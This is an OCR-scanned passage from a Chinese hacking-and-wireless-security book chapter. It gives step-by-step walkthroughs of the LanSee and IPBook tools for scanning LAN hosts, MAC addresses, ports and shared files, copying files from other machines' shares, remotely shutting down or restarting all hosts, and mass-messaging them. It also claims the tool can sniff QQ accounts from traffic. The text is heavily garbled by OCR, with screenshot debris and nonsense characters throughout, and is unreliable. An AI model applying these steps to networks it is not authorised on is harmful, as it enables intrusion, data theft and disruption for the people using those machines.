计算 机 (包括 计算 机 名 、IP 地 址 、MAC 
地 址 、 所 在 工作 组 、 用 户 ) 、 共 享 资 源 、 


共享 文件 ， 可 以 捕获 各 种 数据 包 〈TCP、 
UDP、ICMP、ARP) ， 甚 至 可 以 从 流 过 网 
卡 的 数据 中 嗅 探 出 QQ 号 码 、 音 乐 、 视 频 、 
图 片 等 账号 、 文 件 。 

使 用 该 工具 查看 无 线 局 域 网 中 各 种 信 
恩 的 具体 操作 步骤 如 下 : 
双击 下 载 的 “局 域 网 查看 工具 ” 程 
序 ， 即 可 打开 “局 域 网 查看 工具 ” 主 窗 
口 ， 如 下 图 所 示 。 


碳 后 减 网 寺 专 工具 (Lansee)] V1.72[ 未 注册 ] 一 口 2 
设 评 。 性 务 ” 间 五 [Vj 缅 位” 知 助 (H) 


| 线 得 数 | 肥 ”~v| 确定 
工 呈 选项 工具 号 示 | 任务 刘 客 结束 任务 | 各 件 千 理 更 新 逢 汲 | 通 册 


执行 法 程 称 =0 等 委任 基数 =0 当 测 瘟 口 ; 反 拱 党 口 


在 工具 栏 单 击 “ 工 具 选 项 ”按钮 ， 
即 可 打开 “选项 ”对 话 框 ， 选 择 “ 搜 索 计 
算 机 ”选项 ， 在 其 中 设置 扫描 计算 机 的 
起 始 IP 段 和 结束 IP 地 址 段 等 属性 ， 如 下 图 
所 示 。 


本 相知 称 : DESKTOP-67NQBIF， 


选项 天 
入 搜索 计算 机 
而 搜索 共享 文件 Tr 地址 端口 
< 局 吉 双 聊天 192. 168. 1 139 
翁 > 扫描 端口 192. 168.1.8 445， 1024 


IF 地 址 
超时 (ms) |2000 


选择 “搜索 共享 文件 ”选项 ， 在 
其 中 即 可 添加 和 删除 文件 类 型 ， 如 下 图 
所 示 。 


第 14 章 


选项 Xx 


例 扫 措 端口 


文件 % 弄 | | 出 除 | 清空 
文件 大小 好 以 上 


eT 
[step 轩 选择 “局 域 网 聊天 ”选项 ， 在 其 中 可 以 设 
置 聊天 时 使 用 的 用 户 名 和 备注 ， 如 下 图 所 示 。 


选项 xX 


起 ] 摧 索 计 息 机 

秽 j 搜索 共 享 文件 
局 域 网 隘 天 

合 , 扫 措 端口 


用 户 名 |iESKTOP-67NGBTF | 长 度 小 于 16 个 字 节 


备注 “|LansSee 用 户 | 长 度 小 于 256 个 字 节 


说 明 : 以 上 设置 需要 重新 自动 程序 才能 生效 
癌 ] 接收 到 消息 时 声音 提醒 


性 存 天 闭 


选择 “扫描 端口 ?” 选项 ， 在 其 中 即 可 
设置 扫描 的 卫 地 址 、 端 口 、 超 时 等 属性 ， 设 
置 完 毕 后 单 击 “ 保 存 ” 按 钮 ， 即 可 保存 各 
项 设置 ， 如 下 图 所 示 。 

选项 x 
者 | 扫 索 计算 机 


二 搜索 共享 文件 IF 地 址 端口 
胺 局 域 网 险 天 192. 168.1 139 
192. 168.1.8 445. .1024 


II 地 址 | 


超时 kms) |2000 


| 端口 | | 
添加 遇 除 


清空 


| 保 辛 | 关闭 


在 “局 域 网 查看 工具 ” 主 窗口 中 单 击 

“开始 ”按钮 ， 即 可 搜索 出 指定 IP 段 内 的 主 
机 ， 在 其 中 即 可 看 到 各 个 主机 的 卫 地 址 、 计 
算 机 名 、 工 作 组 、MAC 地 址 等 属性 ， 如 下 
图 所 示 。 
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无 线 局 域 网 的 安全 防护 = 


黑客 攻防 与 无 线 巡 全 从 新 手 到 高 手 ( 超 值 版 ) 


回 后 项 网 二 去 工 只 (LanSee) V1.72[ 未 注册 ] 一 口 x“ 
设 豆 性 务 ” 音 知 [IV] 给 傍 ” 净 助 (H) 


物 区 | 和 | 目 舍 | 入 


工 愉 远 项 工具 号 示 | 任务 浏览 纺 率 任务 | 担 件 管理 更 新 升级 | 运 出 


亚 地 址 计 茎 机 各 工作 组 MA 地 址 用 户 宕 


Pp4.89 Ch.33 60 73 


192.168.0 1 
L392. 166 0 1 以 


DESNIOF -ST7HQEIF WORESEOUT 00. LE ac. MD.13. 5F 
站 L392. 1655. 0. 1 IYIOF-ECVBMGI WXESEOUT 00. 23.24. D3. ES. E5 
三 192z. 1585.0. 112 。 hoIS-611211054 各 REGEOUP C3.60.00. Te. Cc. Dl 
各 152. 153.0.106 ”网关 科技 各 REGEOUF 40. 5. 87. IE. M3. 03 
和 oo dr oh ds HT es res BT nr NAN NR i 
共计 资 项 劝 在 的 计算 机 共 京 文 性 所 在 的 局 寄售 
喇 芭 司 员 工 尾 务 汇 名 192. 168.0 108 ie YA198.16B.1 
中 和 公司 打 E[ 噶 192. 166.0. 106 DSdiS ood 虽 9ffaDfa72630 多 约 E "4198. 166. 1 
装 7iol73 obde083609TfoBadlEbd. .. ‘“\192. 166.1 
部 24f9-9350T9605993150. .. 人 192.155.1Y 


< 2 |I€ 》 


世 用 菩 明 开 络 


bei 


LarS aa 空间 


就 尖 本 机 全 你 ; DESKTOP-67NQBIF， 


[step 贺 如 果 想 与 某 个 主机 建立 连接 ， 在 搜 
索 到 的 主机 列表 中 右 击 该 主机 ， 在 弹出 的 
快捷 菜单 中 选择 “打开 计算 机 ”选项 ， 即 
可 打开 “Windows 安 全 ”对 话 框 ， 在 其 中 
输入 该 主机 的 用 户 名 和 密码 后 ， 单 击 “ 确 
定 ” 按 钮 才 可 以 与 该 按钮 建立 连接 ， 如 下 
图 所 示 。 


Windows 安全 xX 


输入 网 络 凭据 
樟 入 你 的 凭据 以 连接 到 :192.168.0.107 


槐 行 堵 怪 次 =3., 苞 千 任 务 数 =0 当前 瘟 口 ; 挡 案 计 算 机 


域 : DESKTOP-67NQBIF 
口 记 住 我 的 凭据 
四 月 广 各 或 旋 码 不 正确 . 


a 


[step 图 在 “搜索 工具 ”栏目 下 单 击 “主机 巡 
测 ”按钮 ， 即 可 打开 “主机 巡 测 ”窗口 ， 
此 时 可 搜索 出 在 线 的 主机 ， 在 其 中 即 可 看 
到 在 线 主机 的 IP 地 址 、MAC 地 址 、 最 近 扫 
描 时 间 等 信息 ， 如 下 图 所 示 。 


壤 后 项 网 半 霹 工 只 (LanSee) V1,72[ 未 注册 |] 一 口 x 
设 豆 性 务 ” 吝 知 [V] 担任 ”和 关 助 (H) 


哆 了 人 | 时 总 


工 愉 远大 工具 三 示 | 任务 浏 澳 续 军 任务 


目 合 | 和 


担 件 答 理 更 人 新 升级 | ”过 出 
好 过 扫 撕 了 时间 共 字 次 上 捷 


P4. 99 .Ch 33.60 73 1108-14 16:06:D0 
D0. IE ac AD.13 5F 17-08-14 16:08:10 
00. 23.24.05. 大 .ZI5 CL7-08-14 16:05.10 
C3.60.00.9C.CC. D1 17-08-14 16:05:10 
34. BE.52. 35.1T.01 17-08-14 15:05:10 
PE0. WD Co Co.1A SO 17-08-1# 16:06:10 
Ad4.5E a0 1B.7A RAL 1706-1d4 16:08 :10 
[EE 1ES 0 1cS 4D0. JE EY DE. My D3 17-08-14 i168:08 10 
证 !3:. 188.0. 107 58. 7H.34. FB.58. 10 17-08-1d4 16:08.10 
请 13z. ]55.0. ]14 CO. CE.33. 10.M.0E 17-8-14 165:05:1] 

132. 153. 0. 13 68. ¥H. ?¥. EA. EC.IA 17-08-14 16:05:1] 
人 1E8 0 10] 和. 4401 13.48 TB 17-08-14 16:06:12 


亚 地 址 WE 地址 


1L32. 58.0. 1 
的 166.0 1 以 
六 132. 153.0. 1% 
请 132. 153.0.112 


L392. ]58. 0. ] 吧 
192. ]88. 0. 1 
192. 188. 0. 100 


nap UE | Nm 贱 于 沉 站 在线 主 届 数 =12, 最 大 时 =12 读 用 而 明 ”不 止 
[16:02.50 了 中 扫 i A 
[18:03 | i Eat nth 

。 5 - 一] 三 内 
BEE 和 汪 ， 


LarS ea 裕 [=| 


扑 行 堵 入 次 =32 ,等待 任 务 数 =50 当前 瘟 口 ; 主机 关 测 本 机 全 你 ; DESKTOP-67NQBIF， 


在 “局 域 网 查看 工具 ”中 还 可 以 对 
共享 资源 进行 设置 。 在 “搜索 工具 ”栏目 

下 单 击 “3 受 置 共享 资源 ”按钮 ， 即 可 打开 
“设置 共享 资源 ”窗口 ， 如 下 图 所 示 。 


栈 启 城 网 训 志 工具 (LanSee) V1.72[ 未 ; 注册 ] 一 口 x 
设 宇 ”性 务 ” 癌 二 [Vj 浊 位 ” 知 助 (H) 


家 忆 | 名 羡 | 日 @ | 多 


工 愉 迁 硕 工具 三 示 | 任务 测 攻 续 率 任务 | 握 件 管理 更 萄 升级 | 过 


HF 


共 邱 时 辣 


| .| 共有 有 | ~ 添 和 和 共 京 | 他 用 记 轩 


| a 
i 个 请 
二 


| 就 洁 执行 声 枉 炊 =32, 等 待 任务 数 =158 当前 益 口 ; 设 理 共享 资源 ”本 机 名 你 ; DESKTOP-67NQBIF， 


单 击 “ 共 享 目录 ”文本 框 后 的 浏览 报 
钮 ， 即 可 打开 “浏览 文件 来” 对 话 框 ， 如 
下 图 所 示 。 


浏览 文件 夫 x 


请 选择 文件 去 


Y 二 软件 ID)) ~ 
| | 360Downloads 
| 360 安 全 浏览 器 下 载 
| | AdobePhotoshopCC16 32 
8 DESKTOP-OAI361P 
| | EasyBCD v2.2.0.182 
| | FLHS GHOST Win7_SP1 X85 v2014 01(32 
| | Ghost Win10 Pro X32 10586 29 
| | Office 2016 
| | Program Files 
| | QMDownload 
| 字体 库 v 


or 


在 其 中 选择 需要 设置 为 共享 文件 的 文 
单 击 “确定 ” 按 钮 ， 即 可 在 “ 设 
置 共享 资源 ”窗口 中 看 到 添加 的 共享 文件 
夫 ， 如 下 图 所 示 。 


[ 所 蕊 网 辫 厂 工 愉 LanSe=) V1.72|[ 未 注册 ] 一 口 x 
设置 性 各 去 宪 (V) 给 件 阁 助 (H) 


和 人 有 站 日 全 名 


工具 迁 项 工具 王 示 | 仔 伟 浏览 党 率 任 务 ， 贞 件 管理 更 新 升级 运 出 


着 数 了 “| 了 


共享 名 称 文件 夹 叶 径 共享 时 间 
子 件 床 了 :字体 库 无 限 宰 | 


站 京 目录 7. 字体 库 ts 时 目 和 0 用  -  E 有 


Ti6: 可 :91 局 妇 了 了 B14 个 委 氨 沪 口 什 共 


六 前 曾 口 : 设 巡 共享 资源 相机 会 称 : DESKTOP-67NQBIF ,本 


在 “局 域 网 查看 工具 ”窗口 中 还 可 
以 进行 文件 复制 操作 ， 单 击 “ 搜 索 工具 ” 
栏目 下 的 “搜索 计算 机 ”按钮 ， 即 可 打开 
“搜索 计算 机 ”窗口 ， 在 其 中 即 可 看 到 前 
面 添加 的 共享 文件 来， 如 下 图 所 示 。 


碳 后 戏 网 二 去 工具 (LanSee) V1.72[ 未 注册 ] 一 口 x“ 
设 受 性 务 ” 音 知 [VI 组 件 和 助 (H) 
“篇 | 有 六 | 如 人 | 办 线程 歼 | 好、 | 确定 
| 工具 选项 工具 号 示 | 任务 浏览 结束 任务 | 组 件 各 至 更 新 升级 | ”退出 


亚 二 让 计算机 多 工作 组 MODE 地址 用 户 名 和 


2. 1655.0. 114 。。 j70Ic-702111221 WESEOUT CO. CH. 38. 7D. M. OE 
192. 158.0.107 LYs5XIOF-L5KF1SE REGEOU? 58. 78.34. 78. 53. 10 
192.168.0 100 竺 . 5E 60.16 7hA 村 
192. 166.0 101 hd4. 44 TDL. 79 46. 7B 
和 132. 1655.0 1c5 80. 功 .50. 吕 .4 50 
< > 
共 京 次 产 甸 在 的 计算 机 共 京 立 考 所 在 的 局 东信 
公司 员工 任务 汇 乌 192. 168.0 1[8 天 Eyre 
到 和 芭 司 打 E[ 噶 192. 168.0 106 [Juv dety 打开 文件 
总 2 本 更 
总 4 打开 文 忻 御 夫 


* 3 过 全! 这 件 
好 用 说 明 [ 开始 | 


析 行 堵 往 效 =32, 葡 待 任务 数 =53 当 洱 窗口 ; 搜索 计算 机 


在 “共享 文件 ”列表 中 右 击 需要 复制 
站 在 弹出 的 快捷 菜单 中 选择 “复制 
文件 ”菜单 命令 ， 即 可 打开 “建立 新 的 复 
制 任务 ”对 话 框 ， 如 下 图 所 示 。 


本 梓 全 你 ; DESKTOP-67NQBIF， 


建立 新 的 复制 任务 x 
[= 天 三 名 和 柳 
Jara Web 束 育 开 点 实战 .Jsvs Web 束 育 开 发 实 此 .. . 


nA 

育 定 取消 
设置 存储 目录 并 选中 “立即 开始 ” 复 
i 单 击 “确定 ”按钮 即 可 开始 复制 
选 定 的 文件 。 此 时 单 击 “管理 工具 ”栏目 
下 的 “复制 文件 ”按钮 ， 即 可 打开 “复制 
文件 ”窗口 ， 在 其 中 即 可 看 到 刚才 复制 的 
文件 ， 如 下 图 所 示 。 
月 埠 网 言 去 工兵 [LanSes) V1.72[ 未 注册 ] - 0O x 


| 设 喇 任务 ” 理 专 (V) 组件 朱 妈 (H) 


时 如 有 和 | 日 全 


工 只 还 项 工 眼 品 示 | 任务 户 总 续 皇 自 务 | 起 件 秋 理 更 新 升 邓 还 出 


文件 来 源 | 网 上 邻居 


蛙 程 的 32 ”~ 确定 


到 去 | 户 Ei - - 三 
.00:09] 扯 和 DA NE 
ol | 
[i8 14:07] 名 也 -小 淡 口 仔 ; 


执行 浅 俘 数 =1 .等 符 任务 数 =0 当前 窗口 : 复 寺 文件 本 机 企 称 : DESKTOP-67NQBIF ， 
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在 “网 络 信 息 ” 栏 目下 可 以 查看 无 
线 局 域 网 中 各 个 主机 的 网 络 信息 。 例 如 单 
击 “ 活 动 端口 ”按钮 后 ， 在 打开 的 “活动 
端口 ”窗口 中 单 击 “刷新 ”按钮 ， 即 可 
看 到 所 有 主机 中 正在 活动 的 端口 ， 如 下 图 
所 示 。 


畏 后 坛 网 音 二 工具 (Lansse) V1.72[ 未 注册 ] 一 口 x 
设置 ”性 各 ” 震 知 [V) 坦 位 ”帮助 (H] 
各 全 | 交 | wen |e 
he 
Di 进程 本 志 地 址 本 二 浓 口 远程 地 址 远程 消 品 
IC? C:\Froeran Files‘Corm 00.0.0 ED 0.0.0.0 0 
TP unmowa 0.0.0.0 135 0.0.0.0 D 
SII? uknoro 00.00 445 0000 0 
RIC? 5:ICUREIWDICKC YL .0.0.0.0 5827 0.0.0.0 0 
STP un i127 0 0.1 102B 0.0.0.0 0 
SIC? win le.153.0.6 138 0.0.0.0 0 
?FT CC:\Frogran Filss'St 192 188.0.6 1085 221. 256. 9. 152 En 
BI CC:\Froeran Files\Than 192 158.0.5 qd6592 121 10 120 174 SST7 
EU? ”umovo 0.0.0.0 d45 
SP CC: WIN yst er 0.0.0.0 s00 
yc:\Erosran Files\Com... 0.0.0.0 1004 
SP CC:\Frogran FilssAStor 0000 103 
SPP CC:\Frogran Pilesv5tor 0000 1050 
出 村 
[16. 0.33] 创 训 了 674 个 扫 揪 周口 任 夯 
执行 战 福 笋 = 和 等 个 任 务 获 =0 当前 窗口 : 英 动 桨 口 李 机 名称 : DESKTOP-67NQBIF ,本 二 


[sp 图 如 果 想 了 解 计算 机 的 网 络 适 配器 信 

r 则 需 单 击 “ 适 配器 信息 ”按钮 ， 即 可 

在 打开 的 “适配器 信息 ”窗口 中 看 到 网 络 
器 的 详细 信息 ， 如 下 图 所 示 。 


二 后 项 网 壮 吉 工具 (Lansee) V1.72( 示 注册 ] - D x 


认 羡 ” 攻 革 ， 兰 三， 如 件 各 凤 (H) 
物 几 | 和 二 | 目 合 起 
工兵 选项 工具 王 示 | 任务 询 洛 结 率 任 有 | 所 人 和 理 更 新 和 级 | 

加 条 : U3 i 而 RyEIF 

Sh: 


授 出 


3: 255.255.255.0 
ee 所 址 : 182.163.0.1 
ImincSarve! J 
DECE: 192.1653.0.1 


16:04.51] 搜 


人 一 ri 
— — 
be hd 

已 
J 
一 
加 


当前 窗口 ， 送 国 路 信 息 


利用 “局 域 网 查看 工具 ”还 可 以 对 
远程 主机 进行 远程 关机 和 重启 操作 。 单 击 
“管理 工具 ”栏目 下 的 “远程 关机 ” 按 
钮 ， 即 可 打开 “远程 关机 ”窗口 ， 并 单 击 
“导入 计算 机 ”按钮 ， 即 可 导入 整个 局 域 
网 中 所 有 的 主机 ， 选 中 主机 前 面 的 复 选 框 
后 ， 单 击 “ 远 程 关 机 ”按钮 和 “远程 重 
启 ” 按 钮 即 可 分 别 完 成 关闭 和 重启 远程 计 
算 机 的 操作 ， 如 下 图 所 示 。 


本 机 全 你 ; DESKTOP-67NQBIF， 
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无 线 局 域 网 的 安全 防护 一 人 


黑客 攻防 与 无 线 受 全 从 新 手 到 高 手 ( 超 值 版 ) 


加 FMRI Ransed V1.72[ 未 注册 ] 共 享 无 线 局 域 网 中 的 x 件 O 如 采 想 和 无 线 


设 豆 ” 萎 季 ”总 百 册 沽 傍 与 助 (H) 


,| | es 加 局域网 中 用 户 聊天 ， 则 需 单 击 “局 域 网 


控 字 工 旦 


- 


De 聊天 ”按钮 ， 即 可 打开 “局 域 网 聊天 ” 窗 
2 口 ， 如 下 图 所 示 。 


口 于 tse 168 0 10? 回 后 项 网 诗 友 工 只 (LanSee) V1.72[ 未 注册 ] 一 口 x“ 
Igo i188 0 i100 
] 竹 te 158.0. i101 | 设 吾 ” 萎 务 ” 音 志 [W 组 件 和 怒 助 (H) 
] 旺 ! 吧 .155.0.1G5 芒 Eg Re 注 | [SS] 四 针 @ 示 [ 芝 和 
工具 选项 工具 号 示 | 任务 浏览 结束 任务 | 所 件 各 至 到 新 升 肖 | ”退出 


摊 补 工 县 用 户 
他 用 说 用 导 N 计 车 机 | 运程 关机 “| | 运程 重生 JIESETIT-TITRET | 
01673723] g 于 了 0 扫 竹 书 口 任 雪 ~ 
1 
| 吉 es ee vi 丰 
LarS ae 空 日 


就 洁 机 行 浅 行 铭 =32, 等 待 任务 数 =157 当前 窗口 ; 远 租 关机 本 机 名 你 ; DESKTOP-67NQBIF， 


利用 As 查看 工具 ”还 可 以 给 指定 
的 主机 发 送 消息 。 单 击 “ 管 理工 具 ” 栏 目下 的 nn 
“发 送 消息 ”按钮 ， 即 可 打开 “发 送 消息 ” 窗 2 | a 
并 单 击 “ 导入 计算 机 .” 按钮 ， Ep 可 皇 就 洁 一 要 行 堵 层次 =32, 笠 待 任务 数 =189 。” 当 耶 窗口 : 局 域 网 聊天 本 机 人 你 ; DESKTOP-67NQBIF， 
个 无 线 局 域 网 中 所 有 的 主机 ， 如 下 图 所 示 。 在 下 图 的 “发 送信 息 ” 区 域 中 编辑 


信息 


英语 项 网 训 志 工 只 (LanSee) V1.72[ 未 注册 ] 一 口 x FE 发 送 : 关 的 消息 自 后 人 6 2 送 »9 按 和 钮 ， 即 


设 豆 性 务 音 百 册 给 他 ” 关 助 (H) 


ee es 本 和 a i 可 将 该 ; 消息 ;发送 关 出去， 此 时 在 “局 域 网 聊 
ne | ”天 ”窗口 中 即 可 看 到 发 送 的 消息 ， 访 模式 


| 库 92.153.0. 154 


sn ob 比较 类 似 于 QQ 软件 ， 如 下 图 所 示 。 
| 记 92.153.0.114 


< > 宏 还 


于 -入 3 2 J 二 后 项 网 诗 二 工具 (LanSee) V1.72[ 未 注册 ] 一 口 ~ 
122. 18 10 
Faas 1an nm ri v | 讼 各 入 备 癌 厂 YW] 汝 位 稳 盈 (H) 
物 忆 | 如 和 | 目 舍 | 入 二 相当 [到 “| 请 让 
工兵 连 项 工具 三 示 | 任务 济世 纺 亩 任务 | 扰 件 答 理 更 新 升级 | 过 出 


用 户 ESKTDOP-57NQBIF 17-08-14 16:23:19 
刻 IESFT0P-67H9BI 


四 刘 | 的 光 求 信息 名 


trnts 2+Hibernate4SprinclFI7) pdfEY 计 所 


:1 立 件 于 共用 
[16:19.26] 立 件 Javz Wb 整 侣 


LarS aa 空 日 


就 洁 


选择 要 发 送 消息 的 主机 后 ， 在 

消 ge ” i 庆 的 消息 AN » 然 i 

后 单 击 6 2 送 99 按钮 ， 即 可 将 这 条 消息 自 、 发 a 二 Spring 了 07 了) ndE 玉 和 这 厂 
LarS ss 空 昌 


关 给 4 站 定 的 用 9» 此 时 Ep 可 看 到 该 和 主 机 的 就 法 析 行 堵 生 欢 =0, 等 符 任 务 数 =0 当 肖 窗口 ; 局 域 网 聊天 本 机 名 你 ; DESKTOP-67NQBIF， 
发 送 状态 是 正在 发 送 ， 如 下 图 所 示 。 单 击 “文件 共 共享 ” 按钮 ， 即 可 打开 “3 
ad ea 一 口 x ee 共享 ?9 窗 口 ， 在 其 中 即 可 搜索 用 户 共 和 复 


设 坪 医务 ” 吝 厂 [VW] 浊 位 ”各 助 (H) 


| sq | -| 要 二 制 文件 、 派 加 共享 等 操作 ， 如 下 图 所 示 。 


槐 行 活 层 台 =32. 竺 竺 任 务 数 =53 当前 瘟 口 ; 发 送 党 电 本 村 全 你 ; DESKTOP-67NQBIF， 


下 地址 发 冯 状 态 。 表 注 ^ 
口 党 1% 1680 1 回 后 项 网 计 霹 工 只 (LanSee) V1.72[ 未 注册 ] 一 口 x 


口 究 132 158 0 104 设 评 。 性 务 ” 癌 瑟 [V] 给 位 知 助 (H) 

姜 1!52. 153.0. .10 一 - - 

| 密 192. 158.0. 1 和 攻 村 目 忆 3 此 纺 查 数 | 允 ”~ | 确 走 
E Lge. 158. 0. 103 正在 发送 工具 选项 工具 号 示 | 任务 浏览 纺 率 任务 | 扰 件 答 理 更 新 升级 
口 壤 !tse 168.011 
OD 党 !32 166.015 
口 起 !20 ltao im 


1 1o0 1F8 nN 1r1 | 


即 分 立 忻 名 抽 农 用户 共享。 县 外 信件 


我 的 共 瑟 廊 件 文件 喀 径 太 小 [8B) 


至 i. 六 中? ss 


二 的 诺 求 读 久 ) 
讲 Javz kh DE 的 这 3 2+Hibhernate4SprinaclD7) pdf 基 闪 这 有 碗 
了 1 i 


LarSaa 空 日 


就 洁 要 行 堵 生效 =32, 竺 竺 任务 数 =158 当前 窗口 ; 发 送 灌 电 本 机 人 宇 你 ; DESKTOP-67NQBIF， 泳 加 共 字 。 职 背 共 至 


[16:14:02 5 凤 了 下 有 号 口 邮 芝 ~ 
. ¢¢ »9 "2 [18:18 中 和 a ER 
渤 择 “ 聊 天 工具 ”栏目 ， 在 其 中 皮 ra 


Ls > > > 、 四 二 LarS se 空 月 
可 与 无 线 局 域 网 中 用 讲 行 聊 > 码 》 还 可 以 就 洁 直行 活 往 次 =32, 笠 待 任务 数 =21 当前 窗口 ; 文件 共享 本 机 名 你; DESKTOP-67NQBIF， 
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14.2.2 ”使 用 IPBook 工 具 


IPBook 〈 超 级 网 络 邻 届 ) 是 一 款 小 巧 
的 搜索 共享 资源 及 FTP 共 享 的 工具 ， 软 件 自 
解压 后 就 能 直接 运行 。 它 还 有 许多 辅助 功 
能 ， 如 发 送 短信 等 ， 并 且 所 有 功能 不 限于 
无 线 局 域 网 ， 可 以 在 互联 网 使 用 ， 使 用 该 
工具 的 具体 操作 步骤 如 下 : 
双击 下 载 的 IPBook 应 用 程序 ， 打 开 
“IPBook (超级 网 络 邻 居 ) ” 主 窗 口 ， 在 
其 中 即 可 自动 显示 本 机 的 IP 地 址 和 计算 机 
名 ， 其 中 192.168.0.104 和 192.168.0 分 别 是 本 
机 的 JP 地 址 与 本 机 所 处 的 无 线 局 域 网 的 卫 范 
围 ， 如 下 图 所 示 。 


从 IPBock 正式 注册 板 ( 延 加 网 沟 续 后 } - OO x 
Kass) IRm) id 


jp [192. 168. 0 名 接 抽 一 个 网 段 | 息 点 验 夫 京 资 源 | 恰 太 范围 搜捕 
I 地址 [EE 本 全 沸 病 于 -| Pine | mtetat| 共享 | 四 发 短信 | 其 他 I 月 ~ 
总 口 ”|80;21; 135 ”加 探测 吝 口 | 加 大 苑 转 问 口 扫描 | 


计算 机 区 [共享 次 局 区 


I 计划 机 名 组 Ma 
轧 132168.0104 DESKTOPS7NDBIF WORKGROUP C01E.8C.AD.13 环 


crUnkhomm [Yersion 


Pt 中 : 
Feonk (SG 东郭 抽 ] 作 省 : 未 殉 启 
前 而 合计 由 ! 区 的 大 为 过 持 三 | 名 中 专区 的 动力 。 


INBSTAT Response From 192.168.0.104 将 到 内 计 算 访 宏 、 工 作乱 、MAC 拒 入 竺 。 


Po 
re ey 在 “IPBook ( 超 
级 网 络 邻 居 ) ” 主 窗口 中 ， 单 击 “ 扫 描 一 
个 网 段 ” 按钮 ， 几 秒 钟 之 后 ， 本 机 所 在 的 
无 线 局 域 网 所 有 在 线 计 算 机 的 详细 信息 将 
显示 在 左 侧 列表 框 中 ， 如 下 图 所 示 。 其 中 
包含 IP 地 址 、 计 算 机 名 、 工 作 组 、 信 使 等 


信息 。 


从 1PBock 正式 注册 线 (起 级 网 洛 邹 后 | 一 口 x 


p=Teomee= 


| 8 交 转 [TT ra 公 持 项 一 个 网 向 | 向 点 入 闪 京 资源 | 丛 太 地 轩 按 抹 
TF 地 址 at | sa 共享 | 加 安 短 信 | 其 他 工具 ”| 


水 口 ”J80;21; 135 ”加 探 讽 瘦 口 | 回 太 苑 因应 口 扫 撒 


EE 共享 次 源 区 


ELE = [SS: mo 
蝇 ， 392.168.0104 DES5KTOFSNDBIF WORKGROUP [01E.8C.2D.13.9F 
夺 192.168.0104 DESKTOP-S?NDBIF WORKGROUP [01E.8C.AD.13.F 
192.168.0 106 DESKTOPSCVENGI ‘WORKGROUP 00232409B6E5 
192.168.0 107 DESKTOPDSKFIESE ‘WOPkEGROUP SBFB FES 10 
192.168.01[8 网络 WDRKERDUP 可 上 拓 EFDEA3D03 
恩 132.168.0112 AFOIG.611211054 WOPKGROUP CEBJ.00 3C.CC.D1 
叶 192.168.0114 AFOIG-.A02111221 WOREGROUP COCB.38.70.a8.0E 


132.168.0253 不 在 位 


192.168.0254 不 在 位 
到 计 答 机 7 省， 香 到 7 个 计 窒 机 包 bind emor=QJDPcount=? 


| 拉 扩 计算 机 名 任 名 结 素 。 


第 14 章 无线 局 域 网 的 安全 防护 一 全 


[step 图 在 显示 出 所 有 计算 机 信息 后 ， 单 击 
“点 验 共 享 资源 ”按钮 ， 即 可 查 出 本 网 段 
机 器 的 共享 资源 ， 并 将 搜索 的 结果 显示 在 
右 侧 的 树 状 显示 框 中 ， 如 下 图 所 示 ， 在 搜 
索 之 前 还 可 以 设置 是 否 同 时 搜索 HTTP、 
FTP、 隐 藏 共 享 服务 等 。 


全 1PBock 正式 注册 板 (起 级 网 阁 邹 后] - OO Xx 
-一 工具 (VY】 帮助 (Z] 
| EE 
IE 范围 [192. 168.0 下 久 停 止 点 验 | 性 太 范 围 扫 揪 
1 地址 | -| piuz| mt : a 
| 江口 |80;21;135” 辑 探测 沸 口 | 四 
-计算 机 区 [- 共 字 需 区 
1 i | Me 已 蚤 1%2.19 0 10 
| 加 1921680104 DESKTOFPS7NDBIF ‘WORKGAOUP mm1E EC.éD.13.F 回 主体 庄 
| 加 1921680104 DESKTOFS7NDBIF ‘WORKGROUP m1EsCAD135 || 马 钨 12190106 
加 132168.0106 。 DESRTDF5CV8NG| ‘WORKGROUP rm0232409.B6E5 i 
国 192168.0107? DESKTOPDRFISE ‘WORKGROUP 58FB .4 FE.59.10 “时 公司 打印 机 
导 132.1658.0106 同 结 村 村 WwDRKGROUP 4025 EFDE 上 3.D3 
| 里 112 AFDIG.611211054 WORKGRAOUP CBB6D 00 3C.CC.D1 
1921690114 AFOIG702111221 ‘WORKGAOUP CCB 3 7D .AB CE 
192188, ya1FTP 有 中 开 
08 于 421[F 全 号 品 开打 
AS216B0 If 汪 下 此 
192.189.03 的 921 入 TP 谨 口 示 开 访 
192168.09 允 321IFTP 吴 口 不 下 
I | 正 丰裕 概 192.166.0.139 交 共享 资源 


[step 加 在 IPBook 工 具 中 还 可 以 给 目标 网 
段 发 送 短 信 ， 在 “IPBook (超级 网 络 领 
居 ) ” 主 窗 口中 单 击 “短信 和 群发 ”按钮 ， 
即 可 打开 “短信 群发” 对话 框 ， 如 下 图 
所 示 。 


192.168.0 


三 群发 和 直 信 给 已 经 搜索 到 的 的 计算 机 


匠 叶 人 的 景 位 如 于 江水 ， 连 绵 不 绝 。 
今天 你 喧 干 扰 素 了 上 9 噶 完 了 汀 子 不 要 乱 扔 ， 乱 扔 要 三 择 放 \ 有 有 


即 全 不 到 小 朋友 ， 施肥 | 小 鱼 也 不 好 啊 。 


kind reguard 
收 信人 ， | 原 要 的 先生 王 自动 使 用 收 信者 的 信和 
关中 和 | 入 伯 区 省 三 自动 使 用 发 信者 的 信介 


取消 帮助 


[step 图 在 “计算 机 区 ”列表 中 选择 某 台 计 
算 机 ， 单 击 Ping 按 钮 ， 即 可 在 “IPBook 
(超级 网 络 邻 居 ) ” 主 窗口 看 到 该 命令 的 
运行 结果 ， 如 下 图 所 示 。 根 据 得 到 的 信息 
来 判断 目标 计算 机 的 操作 系统 类 型 。 
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黑客 攻防 与 无 线 妥 全 从 新 手 到 高 手 〈 超 值 版 ) 


星 IPBook 正式 注 科 版 ( 超 拔 网 记分 居 ) 一 口 x 
文 忻 (W) 工具 Y) 年 肝 加) 
扫描 。 | 效 殷 库 | 旋 甩 管理 号 | 


| rf 范围 |192. 168.0 扩招 撕 一 个 网 段 | 向 点 扒 共 吝 资 源 了 | 恰 大 箔 甜 旨 捕 | 加 短信 群 崔 


TF 地址 [152. 16%. 0. 108 "| pirg mbtstat | ss 共享 加 次 拒 信 | 其 他 工具 
| 训 口 ”J80;21.135 加 所 则 kD | 回 大 范 转口 扫描 | 


- 计 蔗 机 区 - - 共 可 浊音 区 一 一 一 一 一 一 
i “| 日 本 192.188.0.104 [DBSETO 
到 1S21630104 CESKTOP.ETNOBIF DRKGROUP DDE BCAD 13， - 匠 字体 陈 
型 1 和 1680105 DESkKTOP.SCVBNGI ‘WOAKGRDUP 0033 直 09861 | | 日 量 e108.0.103 
暂 1 吧 168010? DESKTOP.DRFIE ‘WORKGAOUP 58.F8.84.FB.58. -二 人 汉 吕 工 任务 后 
